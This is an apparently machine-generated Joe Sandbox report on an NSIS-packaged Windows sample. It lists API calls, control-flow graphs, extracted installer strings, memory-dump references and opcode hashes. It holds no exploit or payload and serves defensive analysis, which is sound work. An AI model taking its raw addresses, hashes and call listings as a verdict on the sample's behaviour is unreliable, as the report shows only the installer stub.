                                                    • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                    • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                    • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                    • API String ID: 2435955865-239407132
                                                    • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                    • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                    • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                    • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                    • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                    • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                    • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                    APIs
                                                    • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                    • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                    • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: AddressHandleLibraryLoadModuleProc
                                                    • String ID:
                                                    • API String ID: 310444273-0
                                                    • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                    • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                    • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                    • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                    • FindClose.KERNEL32(00000000), ref: 004062EC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                    • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                    • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                    • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                    APIs
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                    • ShowWindow.USER32(?), ref: 004054D2
                                                    • DestroyWindow.USER32 ref: 004054E6
                                                    • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                    • GetDlgItem.USER32(?,?), ref: 00405523
                                                    • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                    • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                    • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                    • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                    • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                    • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                    • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                    • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                    • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                    • EnableWindow.USER32(?,?), ref: 00405757
                                                    • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                    • EnableMenuItem.USER32(00000000), ref: 00405774
                                                    • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                    • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                    • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                    • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                    • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                    • String ID: @rD
                                                    • API String ID: 3282139019-3814967855
                                                    • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                    • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                    • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                    • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                    APIs
                                                    • PostQuitMessage.USER32(00000000), ref: 00401648
                                                    • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                    • SetForegroundWindow.USER32(?), ref: 004016CB
                                                    • ShowWindow.USER32(?), ref: 00401753
                                                    • ShowWindow.USER32(?), ref: 00401767
                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                    • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                    • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                    • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                    • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                    • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                    • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                    • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                    Strings
                                                    • Rename: %s, xrefs: 004018F8
                                                    • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                    • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                    • Rename failed: %s, xrefs: 0040194B
                                                    • detailprint: %s, xrefs: 00401679
                                                    • Call: %d, xrefs: 0040165A
                                                    • SetFileAttributes failed., xrefs: 004017A1
                                                    • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                    • CreateDirectory: "%s" created, xrefs: 00401849
                                                    • BringToFront, xrefs: 004016BD
                                                    • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                    • Jump: %d, xrefs: 00401602
                                                    • Rename on reboot: %s, xrefs: 00401943
                                                    • Sleep(%d), xrefs: 0040169D
                                                    • Aborting: "%s", xrefs: 0040161D
                                                    • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                    • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                    • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                    • API String ID: 2872004960-3619442763
                                                    • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                    • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                    • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                    • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                    APIs
                                                      • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                      • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                      • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                    • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                    • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                    • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                    • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                      • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                    • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                    • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                    • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                      • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                    • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                    • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                    • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                    • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                    • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                    • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                    • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2211259350.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.2211240254.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211289711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211311941.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.2211425182.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_ldqj18tn.jbxd
                                                    Similarity
                                                    • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
